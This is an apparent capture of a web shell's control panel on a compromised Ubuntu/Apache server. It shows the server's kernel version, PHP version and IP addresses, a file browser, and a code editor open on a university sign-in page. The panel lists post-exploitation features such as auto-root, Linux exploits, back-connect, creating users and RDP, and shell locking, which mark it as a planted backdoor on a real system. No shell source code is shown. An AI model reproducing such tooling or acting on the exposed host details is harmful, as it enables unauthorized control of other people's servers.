Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.117.231.160
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
ibm /
kusdde /
[ HOME SHELL ]
Name
Size
Permission
Action
MainPage.html
6.56
KB
-rwxr-xr-x
MainPage_18122020.html
6.38
KB
-rwxr-xr-x
MainPage_old.html
5.5
KB
-rwxr-xr-x
downloadverifieddoc.html
6.3
KB
-rwxr-xr-x
index.html
5.81
KB
-rwxr-xr-x
index_18122020.html
5.49
KB
-rwxr-xr-x
index_old.html
5.39
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index_old.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport" /> <title>Sign In</title> <!-- Favicon--> <link rel="icon" href="favicon.png" type="image/png" /> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Roboto:400,700&subset=latin,cyrillic-ext" rel="stylesheet" type="text/css" /> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css" /> <!-- Bootstrap Core Css --> <link href="../plugins/bootstrap/css/bootstrap.css" rel="stylesheet" /> <!-- Waves Effect Css --> <link href="../plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Animation Css --> <link href="../plugins/animate-css/animate.css" rel="stylesheet" /> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="../css/themes/all-themes.css" rel="stylesheet" /> <!-- Custom Css --> <link href="../css/style.css" rel="stylesheet" /> </head> <body class="theme-cyan"> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid"> <div class="navbar-header"> <a href="javascript:void(0);" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar-collapse" aria-expanded="false" ></a> <a href="javascript:void(0);" class="bars"></a> <h2 class="nhdr m-t--5">KUVEMPU UNIVERSITY</h2> </div> </div> </nav> <!-- #Top Bar --> <section class="content"> <div class="container-fluid"> <div class="row clearfix m-t-100"> <div class="col-md-offset-2 col-lg-5 col-md-5 col-sm-6 col-xs-12 p-r--10" > <div class="card"> <div class="header bg-cyan"> <h2> Login </h2> </div> <div class="body"> <div class="form-horizontal"> <div class="row clearfix"> <div class="col-lg-4 col-md-4 col-sm-4 col-xs-5 form-control-label p-b-20" > <label class="pull-center" for="username">Username</label> </div> <div class="col-sm-4 col-md-7"> <div class="form-group"> <div class="form-line"> <input type="text" class="form-control" id="username" name="username" placeholder="username" required autofocus /> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-lg-4 col-md-2 col-sm-4 col-xs-5 form-control-label p-b-20" > <label class="pull-center" for="Password">Password</label> </div> <div class="col-sm-4 col-md-7"> <div class="form-group"> <div class="form-line"> <input type="password" id="password" name="password" class="form-control" placeholder="password" /> </div> </div> </div> </div> <div class="row"> <div class="col-lg-offset-8 col-md-offset-2 col-sm-offset-4 col-xs-offset-5 col-md-3" > <button class="btn btn-primary waves-effect m-l-15" name="login" onclick="login()" id="login" > SIGN IN </button> </div> </div> </div> </div> </div> </div> </div> </div> </section> <!-- Jquery Core Js --> <script src="../plugins/jquery/jquery.min.js"></script> <script src="../libs/jquery.blockUI.js"></script> <!-- Bootstrap Core Js --> <script src="../plugins/bootstrap/js/bootstrap.js"></script> <!-- Waves Effect Plugin Js --> <script src="../plugins/node-waves/waves.js"></script> <!-- Validation Plugin Js --> <script src="../plugins/jquery-validation/jquery.validate.js"></script> <!-- Custom Js --> <script src="../js/admin.js"></script> <script src="../js/login.js"></script> </body> <script type="text/javascript"> $(document).ready(function() { var inputs = $("input").keypress(function(e) { if (e.which == 13) { e.preventDefault(); var nextInput = inputs.get(inputs.index(this) + 1); if (nextInput) { nextInput.focus(); } } }); }); </script> </html>
Close